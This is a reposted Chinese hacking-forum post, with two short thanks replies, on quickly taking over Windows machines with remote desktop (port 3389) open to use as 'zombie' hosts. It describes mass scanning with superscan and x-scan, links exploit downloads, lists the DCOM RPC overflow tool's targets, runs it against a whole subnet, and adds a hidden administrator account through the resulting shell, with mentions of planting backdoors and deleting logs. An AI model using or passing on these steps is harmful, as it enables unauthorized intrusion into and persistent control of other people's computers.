返回列表 发帖

快速获得3389肉机

快速获得3389肉机这是我第一次写技术文章,不当之处还请大家指正。 记得从前看过一篇文章介绍如何快速获得3389肉机的文章,基本思路及步骤如下:先通过superscan等扫描端口的工具扫一段开启3389端口的主机,然后导出主机列表,再由x-scan扫描NT弱口令,配置强一点的字典,稍等一会儿,得到偌多弱口令,祭起终端连接,成功连接填入用户名就可以远程登陆控制了。留后门,删日志…… 其实得到开启3389服务的主机列表后,我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号,再用这个帐号轻松地登陆到远程终端,达到图形化的完全控制。 用到的工具有:superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn,专门用来扫描存在DComRpc漏洞的机器。可以到这里下载http://www.xfocus.net/tools/200307/DComRpc.xpn,把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试,这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具点击这里下载http://81.heibai.net:81/download/show.php?id=3951。 要开工了。用superscan得到主机列表,save成文本文件修改为一行一个IP的格式,这个过程略过不说了。打开加入了插件的x-scan,扫描参数中选“从文件获取主机列表”,选取刚才保存的文件。在扫描模块中只选择最后一项,也就是刚加进去的插件,Dcomrpc溢出漏洞。开始扫描吧,你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了,先看一下帮助吧: --------------------------------------------------------- - 远程 DCOM RPC 缓冲区溢出 - Original code by FlashSky and Benjurry - Rewritten by HDM - EXE 文件编译及修改:sagi http://www.hackerxfiles.net - Usage: xp - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP0 (english2) - 2 Windows 2000 SP1 (english) - 3 Windows 2000 SP2 (english) - 4 Windows 2000 SP2 (english2) - 5 Windows 2000 SP3 (english) - 6 Windows 2000 SP3 (english2) - 7 Windows 2000 SP3 (english3) - 8 Windows 2000 SP4 (english) - 9 Windows XP SP0 (english) - 10 Windows XP SP1 (english) - 11 Windows XP SP1 (english2) - 12 Windows XP SP2 (english) - 13 Windows 2000 SP3 (chinese) - 14 Windows 2000 SP4 (chinese) - 15 Windows XP SP0 (chinese) - 16 Windows XP SP1 (chinese) - 17 Windows 2000 SP0 (japanese) - 18 Windows 2000 SP1 (japanese) - 19 Windows 2000 SP2 (japanese) - 20 Windows 2000 SP0-1 (big5) - 21 Windows 2000 SP3 (big5) - 22 Windows 2000 SP4 (big5) - 23 Windows XP SP0-1 (big5) - 24 Windows 2000 SP0 (korean) - 25 Windows 2000 SP1 (korean) - 26 Windows 2000 SP2 (korean) - 27 Windows 2000 SP4 (korean) 明白了吗?现在我们就可以这样了: xp 13 192.168.1.* 一段提示过后,看到跳出的shell了吗? c:\winnt\system32> 呵呵,到这一步,一切都好做了 c:\winnt\system32>net user admin hahaha /add 命令成功完成 c:\winnt\system32>net localgroup administrators admin /add 命令成功完成 好了,现在就可以用这个帐号admin进行3389远程控制了。 这种方法比较简单吧,要比起破解nt弱口令要主动一些,在此也是提出一种思路吧。从一开始的输入法漏洞开始,3389注定不能平安,愿大家都找到自己好用的肉机吧~ 以上为转载~! :em03:

快速获得3389肉机

经典

TOP

快速获得3389肉机

谢谢你了。

TOP

返回列表 回复 发帖